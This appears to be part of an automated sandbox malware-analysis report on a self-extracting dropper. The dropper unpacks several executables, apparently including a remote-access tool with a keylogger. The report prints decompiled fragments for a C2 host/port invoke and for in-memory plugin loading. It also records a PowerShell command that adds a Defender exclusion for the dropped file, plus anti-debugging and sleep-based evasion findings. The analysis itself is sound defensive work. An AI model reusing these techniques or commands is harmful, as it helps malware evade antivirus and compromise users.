                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.staterepositoryclient.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: profapi.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: appxdeploymentclient.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: d3d11.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: d3d10warp.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: bcp47mrm.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: dxcore.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: d2d1.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: dwrite.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.applicationmodel.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: textshaping.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.shell.servicehostbuilder.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: execmodelproxy.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: rmclient.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: uiamanager.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.core.textinput.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.immersive.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: dataexchange.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: cryptbase.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.storage.applicationdata.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: logoncli.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.globalization.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.globalization.fontgroups.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: fontgroupsoverride.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.xaml.controls.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.energy.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.graphics.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: winrttracing.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.xaml.phone.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: directmanipulation.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: twinapi.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: userenv.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: profext.dll
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.web.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe File opened: C:\Windows\SysWOW64\riched32.dll
                            Source: Window Recorder Window detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations
                            Source: Ekpb7jn7mf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: calc.pdbGCTL source: rKPaQokQ.exe, 00000001.00000000.1665460578.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe, 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe.0.dr
                            Source: Binary string: calc.pdb source: rKPaQokQ.exe, 00000001.00000000.1665460578.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe, 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe.0.dr
                            Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: Ekpb7jn7mf.exe

                            Data Obfuscation

                            Source: YsrQekGS.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: YsrQekGS.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: YsrQekGS.exe.0.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: YsrQekGS.exe.0.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
                            Source: YsrQekGS.exe.0.dr, Messages.cs .Net Code: Memory
                            Source: rKPaQokQ.exe.0.dr Static PE information: 0x8F598A9E [Sun Mar 18 18:21:18 2046 UTC]
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_004254C5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_004254C5
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_6674281
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0041F891 push ecx; ret 0_2_0041F8A4
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0041A250 push eax; ret 0_2_0041A26E
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Code function: 4_2_00007FFD9B2727F2 pushad ; ret 4_2_00007FFD9B2727F9
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Code function: 4_2_00007FFD9B272ACD push ecx; retf 4_2_00007FFD9B272AE6
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Code function: 4_2_00007FFD9B279E0D push ebx; ret 4_2_00007FFD9B279E6A
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD9B18D2A5 pushad ; iretd 10_2_00007FFD9B18D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD9B372316 push 8B485F92h; iretd 10_2_00007FFD9B37231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD9B19D2A5 pushad ; iretd 13_2_00007FFD9B19D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD9B2B23CD pushad ; retf 13_2_00007FFD9B2B23F1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD9B2BC2C5 push ebx; iretd 13_2_00007FFD9B2BC2DA
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD9B382316 push 8B485F91h; iretd 13_2_00007FFD9B38231B
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe File created: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe (dropped file)
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe File created: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe (dropped file)
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe File created: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe (dropped file)

                            Hooking and other Techniques for Hiding and Protection

                            Source: initial sample Icon embedded in binary file: icon matches a legit application icon: download (31).png
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 9336
                            Source: unknown Network traffic detected: HTTP traffic on port 9336 -> 49730
                            Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 9336
                            Source: unknown Network traffic detected: HTTP traffic on port 9336 -> 49737
                            Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 9336
                            Source: unknown Network traffic detected: HTTP traffic on port 9336 -> 49738
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe; Memory allocated: 12E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe; Memory allocated: 2BE0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe; Memory allocated: 4BE0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe; Memory allocated: BE0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe; Memory allocated: 1A6F0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe; Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe; Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe; Window / User API: threadDelayed 3751
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe; Window / User API: threadDelayed 5426
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe; Window / User API: threadDelayed 473
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe; Window / User API: threadDelayed 9360
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5069
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4757
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 7557
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2006
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe; Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_0-19130
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe; Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_0-21574
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe TID: 7680; Thread sleep time: -28592453314249787s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe TID: 6936; Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe TID: 6792; Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe TID: 8152; Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500; Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808; Thread sleep count: 7557 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808; Thread sleep count: 2006 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832; Thread sleep time: -3689348814741908s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe; File Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe; Code function: 0_2_00409396 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00409396
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe; Code function: 0_2_0040DD0E SendDlgItemMessageW,DestroyIcon,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SHGetFileInfoW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0040DD0E
                            Source: wjoqZlIS.exe, 00000002.00000002.1813715305.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
                            Source: YsrQekGS.exe, 00000004.00000002.2937204022.000000001B7D4000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe; Process information queried: ProcessInformation
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe; Code function: 0_2_0041E48E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041E48E
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe; Code function: 0_2_004254C5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_004254C5
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe; Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe; Process token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe; Code function: 0_2_0042327E SetUnhandledExceptionFilter,0_2_0042327E
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe; Code function: 0_2_00423D39 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,0_2_00423D39
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe; Code function: 0_2_0041FD8B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041FD8B
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe; Code function: 1_2_00007FF630CE1890 SetUnhandledExceptionFilter,1_2_00007FF630CE1890
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe; Code function: 1_2_00007FF630CE1240 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF630CE1240
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe; Memory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

Source: wjoqZlIS.exe.0.dr, NativeHelper.cs | Reference to suspicious API methods: LoadLibrary("kernel32")
Source: wjoqZlIS.exe.0.dr, NativeHelper.cs | Reference to suspicious API methods: GetProcAddress(hModule, "GetConsoleWindow")
Source: YsrQekGS.exe.0.dr, Messages.cs | Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: YsrQekGS.exe.0.dr, XLogger.cs | Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'
